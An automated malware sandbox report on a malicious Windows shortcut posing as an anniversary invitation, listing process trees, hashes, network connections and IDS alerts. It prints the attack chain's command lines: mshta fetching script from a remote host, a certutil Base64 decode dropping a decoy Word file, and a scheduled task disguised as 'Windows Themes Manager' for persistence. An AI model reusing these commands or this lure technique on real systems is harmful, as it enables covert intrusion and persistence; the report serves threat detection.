File name: Приглашение[Касат. 80-летия Августовской революции 1945 г. и Дня Независимости].lnk

Full analysis: https://app.any.run/tasks/e9b5ac72-a9d5-4e1d-8207-6d1e296ae641
Verdict: Malicious activity
Analysis date: September 01, 2025, 10:57:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Mon Jul 13 23:42:23 2009, atime=Thu Aug 21 09:16:25 2025, mtime=Tue Jul 14 01:14:25 2009, length=0, window=showminnoactive, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
MD5: 6D18166DA354EFACD541BCAC622A6E43
SHA1: 1147B53B0882A1733BD7E4F94148463163549983
SHA256: 028289FAC74184AB05C8E57E61E60F97E1345F20A5D523B995B29EB7BFC23C92
SSDEEP: 24:8FfOZsxitDTlHXSlKalzx8AUQd+/ZxFKqzEQ:8FfItDTtSbNdmQQ

  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 2728)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3788)
    • Decoding a file from Base64 using CertUtil

      • cmd.exe (PID: 5460)
    • Likely accesses (executes) a file from the Public directory

      • WINWORD.EXE (PID: 4196)
    • Suspicious WINWORD start

      • WINWORD.EXE (PID: 4196)
    • The process executes via Task Scheduler

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3788)
    • Checks proxy server information

      • mshta.exe (PID: 3788)
      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
      • slui.exe (PID: 6372)
    • Reads the software policy settings

      • slui.exe (PID: 6372)
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata
FileAttributes: Archive
CreateDate: 2009:07:13 23:42:23+00:00
AccessDate: 2025:08:21 09:16:25+00:00
ModifyDate: 2009:07:14 01:14:25+00:00
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
DriveType: Fixed Disk
DriveSerialNumber: F423-8020
VolumeLabel: -
LocalBasePath: C:\Windows\System32\mshta.exe
Description: Type: Microsoft Word Document Size: 40 KB Date modified: 8/30/2025 3:17 PM
RelativePath: ..\..\..\Windows\System32\notepad.exe
Total processes: 152
Monitored processes: 12
Malicious processes: 2
Suspicious processes: 1

Behavior graph

start mshta.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs certutil.exe no specs winword.exe ai.exe no specs wscript.exe slui.exe wscript.exe

Process information

PID | CMD | Path | Indicators | Parent process
PID: 2040
CMD: certutil -decode -f L298306.tmp "E-CARD.docx"
Path: C:\Windows\System32\certutil.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: CertUtil.exe
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 2728
CMD: "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Windows Themes Manager" /tr "wscript.exe \"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Themes.js\"" /f
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 3624
CMD: "wscript.exe" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Themes.js"
Path: C:\Windows\System32\wscript.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
PID: 3788
CMD: "C:\Windows\System32\mshta.exe" http://iuh234.medianewsonline.com
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.19041.1 (WinBuild.160101.0800)
PID: 4196
CMD: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\E-CARD.docx" /o ""
Path: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 16.0.16026.20146
PID: 5236
CMD: "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "8DC0C6D4-7C6B-4E5E-84A5-F6DD95C10301" "140CDB26-7664-45C2-B364-C3E00499E752" "4196"
Path: C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version: 0.12.2.0
PID: 5460
CMD: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public && certutil -decode -f L298306.tmp "E-CARD.docx" && del /f /q *.tmp && "E-CARD.docx"
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 6160
CMD: schtasks /create /sc minute /mo 1 /tn "Windows Themes Manager" /tr "wscript.exe \"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Themes.js\"" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Task Scheduler Configuration Tool
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 6372
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 6832
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Total events: 18 096
Read events: 17 710
Write events: 363
Delete events: 23

Modification events

(PID) Process: (5460) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Operation: write
Name: Word.Document.12
Value:
(PID) Process: (5460) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation: write
Name: {5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
0100000000000000BF11833D2F1BDC01
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4196
Operation: write
Name: 0
Value:
0B0E10C8426F80F4ED5541AB7519F0D1601D1823004689A19EF1F3E586EE016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511E420D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: en-US
Value: 2
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: de-de
Value: 2
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: fr-fr
Value: 2
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: es-es
Value: 2
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: it-it
Value: 2
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: ja-jp
Value: 2
(PID) Process: (4196) WINWORD.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: ko-kr
Value: 2
Executable files: 34
Suspicious files: 128
Text files: 19
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres | binary
MD5:D33FE7C53CF8F6A57E6BC354F9077AB3
SHA256:7A2F9CA7DA4F70D8583D8AA9AEBC2A8FA5A4271C971E07301AF3F6D5062FDBC9
3788 | mshta.exe | C:\Users\Public\L298306.tmp | text
MD5:18D872436627D9551BEA5CFD43C6B3C2
SHA256:8D81BD3624AC1E5446D92DB5CB6CFDB6C04B47650246E9A377D824E2BFD8892F
4196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\E-CARD.docx.LNK | binary
MD5:BBC95D09C5741C9994951BAE045D5B04
SHA256:AB690FDCE0E1A47E874994BD58F696926A1928F01027160345690671994D1771
4196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | binary
MD5:1397418AA7892D3A4CA2FFDA38561850
SHA256:2B8F3784810EB64DF773E32660E719FBBB24BF724210A6078D22ED8F7BC008DB
4196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CCB1AF0B-5D13-4307-83CC-251D4F6F58D7 | xml
MD5:CA50D915ECC6A40D4F64338D0D7DDC80
SHA256:456D79CA0341D5EEF1B6F2FC10DE43F41D14383981D33E1143C6FB26FD521A1D
2040 | certutil.exe | C:\Users\Public\E-CARD.docx | document
MD5:E44EFEE3EBC96BB5187711A7C9177D37
SHA256:F32E2BB18F6DD2738408FF51B4FA8CCBF8DD7B5CCF1EEFEC24221EAF2278D4B0
4196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin | text
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
4196 | WINWORD.EXE | C:\Users\Public\~$E-CARD.docx | binary
MD5:CA84C8A0548736BC19EFB8049B4484B6
SHA256:F9B0634EF16F9590DCE3A7B7257C608A30A200E9A5B353ED156CEB6F24F86960
4196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin | text
MD5:1E61B420AB98F10E7AA57DBED4B44961
SHA256:C1DD3A5755E347F439EC120070C3685B8903083D6E7B26DA35F305AF89069D99
4196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text
MD5:632A6D7707C819F05528F2B2D923C7BB
SHA256:745F310B0521B691AC6297E68D7ACDCB0FFCBED7EBD84348CD4EF5DEE6628082
HTTP(S) requests: 17
TCP/UDP connections: 69
DNS requests: 32
Threats: 5

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3460 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | binary | 471 b | whitelisted
4196 | WINWORD.EXE | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | US | binary | 471 b | whitelisted
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
1268 | svchost.exe | GET | 200 | 2.16.164.73:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
4196 | WINWORD.EXE | GET | 200 | 2.16.164.73:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
4196 | WINWORD.EXE | GET | 200 | 2.16.164.73:80 | http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl | NL | binary | 564 b | whitelisted
4196 | WINWORD.EXE | GET | 200 | 2.16.164.73:80 | http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl | NL | binary | 519 b | whitelisted
3788 | mshta.exe | GET | 200 | 185.176.43.108:80 | http://iuh234.medianewsonline.com/ | BG | html | 16.9 Kb | unknown
4196 | WINWORD.EXE | GET | 200 | 2.16.164.73:80 | http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl | NL | binary | 767 b | whitelisted
4196 | WINWORD.EXE | GET | 200 | 2.16.164.73:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | NL | binary | 824 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4024 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3788 | mshta.exe | 185.176.43.108:80 | iuh234.medianewsonline.com | Zetta Hosting Solutions LLC. | BG | unknown
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4196 | WINWORD.EXE | 52.109.28.46:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | GB | whitelisted
4196 | WINWORD.EXE | 52.123.129.14:443 | ecs.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
4196 | WINWORD.EXE | 23.50.131.71:443 | omex.cdn.office.net | Akamai International B.V. | DE | whitelisted
4196 | WINWORD.EXE | 23.212.222.21:443 | fs.microsoft.com | AKAMAI-AS | AU | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.124.78.146, 40.127.240.158 | whitelisted
google.com | 172.217.16.142 | whitelisted
iuh234.medianewsonline.com | 185.176.43.108 | unknown
officeclient.microsoft.com | 52.109.28.46 | whitelisted
ecs.office.com | 52.123.129.14, 52.123.128.14 | whitelisted
omex.cdn.office.net | 23.50.131.71, 23.50.131.87 | whitelisted
fs.microsoft.com | 23.212.222.21 | whitelisted
messaging.engagement.office.com | 52.111.236.4 | whitelisted
messaging.lifecycle.office.com | 52.109.16.3 | whitelisted
nleditor.osi.office.net | 172.187.61.156 | whitelisted

Threats

PID | Process | Class | Message
3788 | mshta.exe | Misc activity | ET INFO Observed UA-CPU Header
3788 | mshta.exe | Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] VBS is used to run Shell
3788 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of eval % Encoding
3624 | wscript.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of eval % Encoding
7052 | wscript.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of eval % Encoding
Process | Message
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.